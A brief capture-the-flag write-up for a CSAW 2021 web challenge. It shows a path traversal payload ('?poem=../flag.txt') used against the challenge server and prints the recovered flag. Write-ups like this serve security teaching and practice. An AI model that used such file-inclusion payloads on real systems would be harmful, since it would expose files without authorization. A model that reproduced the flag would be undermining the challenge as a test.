Solved by [Amdj3dax](https://github.com/amdjedbens) from [OctaC0re](https://ctftime.org/team/141485) team.

Hey! I made a cool website that shows off my favorite poems. See if you can find flag.txt somewhere!

http://web.chal.csaw.io:5003

Just changed the GET argument to "../flag.txt"

http://web.chal.csaw.io:5003/poems/?poem=../flag.txt

and there you go:

**flag{l0c4l_f1l3_1nclusi0n_f0r_7h3_w1n}**

Original writeup (https://github.com/amdjedbens/CTF-Writeups/blob/main/CSAW_CTF_Qualification_Round_2021.md).